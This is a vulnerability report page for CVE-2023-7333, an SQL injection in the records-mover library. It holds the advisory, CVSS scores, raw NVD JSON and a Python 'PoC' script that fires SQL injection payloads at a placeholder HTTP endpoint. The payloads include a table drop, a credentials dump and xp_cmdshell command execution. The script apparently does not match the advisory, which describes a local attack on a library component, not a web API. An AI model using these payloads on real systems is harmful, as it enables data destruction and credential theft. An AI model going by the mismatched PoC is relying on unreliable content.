Security Vulnerability Report
CVE-2023-7333 CVSS 5.3 MEDIUM

CVE-2023-7333

Published: 2026-01-07 23:15:43
Last Modified: 2026-04-15 00:35:42

Description

A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. Manipulating it causes SQL injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

bluelabsio records-mover <= 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-7333 PoC - SQL Injection in bluelabsio records-mover Table Object Handler
# Affected: records-mover <= 1.5.4
# Reference: https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa
import requests
import json

# Target configuration
TARGET_URL = "http://target-server/api/v1/table-handler"
VULNERABLE_ENDPOINT = "/records-mover/table-object"

# SQL Injection payload examples
PAYLOADS = [
    "table_name'; DROP TABLE users;--",
    "table_name' UNION SELECT * FROM credentials--",
    "table_name' AND (SELECT CASE WHEN 1=1 THEN 1/0 ELSE 0 END)--",
    "table_name'; EXEC xp_cmdshell('whoami');--"
]


def test_sql_injection(target_url, payload):
    """Test for SQL injection vulnerability"""
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (SQLi-Test)'
    }
    data = {
        'table_name': payload,
        'operation': 'move',
        'source_db': 'source_database',
        'target_db': 'target_database'
    }
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        # Check for SQL error indicators
        error_indicators = ['sql', 'syntax', 'mysql', 'postgres', 'sqlite', 'error', 'exception']
        response_lower = response.text.lower()
        if any(indicator in response_lower for indicator in error_indicators):
            print(f"[+] Potential SQL Injection detected with payload: {payload}")
            print(f"[+] Response: {response.text[:200]}")
            return True
        elif response.status_code == 500:
            print(f"[!] Server error (500) with payload: {payload}")
            return True
    except Exception as e:
        print(f"[-] Error testing payload: {e}")
    return False


def exploit_bluelabsio_records_mover(target_url):
    """Main exploitation function"""
    print(f"[*] Testing CVE-2023-7333 on {target_url}")
    print(f"[*] Target: bluelabsio records-mover Table Object Handler")
    for payload in PAYLOADS:
        print(f"\n[*] Testing payload: {payload}")
        if test_sql_injection(target_url, payload):
            print(f"[+] Vulnerable!")
    print("\n[*] Mitigation: Upgrade to records-mover >= 1.6.0")
    print("[*] Patch: https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        exploit_bluelabsio_records_mover(sys.argv[1])
    else:
        print("Usage: python cve_2023_7333_poc.py <target_url>")
        print("Example: python cve_2023_7333_poc.py http://vulnerable-server/api")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-7333", "sourceIdentifier": "[email protected]", "published": "2026-01-07T23:15:42.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component."}, {"lang": "es", "value": "Se ha identificado una debilidad en bluelabsio records-mover hasta 1.5.4. El elemento afectado es una función desconocida del componente Table Object Handler. Esta manipulación causa inyección SQL. El ataque necesita ser lanzado localmente. Actualizar a la versión 1.6.0 es suficiente para solucionar este problema. Nombre del parche: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. 
Debe actualizar el componente afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", 
"availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/bluelabsio/records-mover/", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/pull/254", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/releases/tag/v1.6.0", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339566", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339566", "source": "[email protected]"}]}}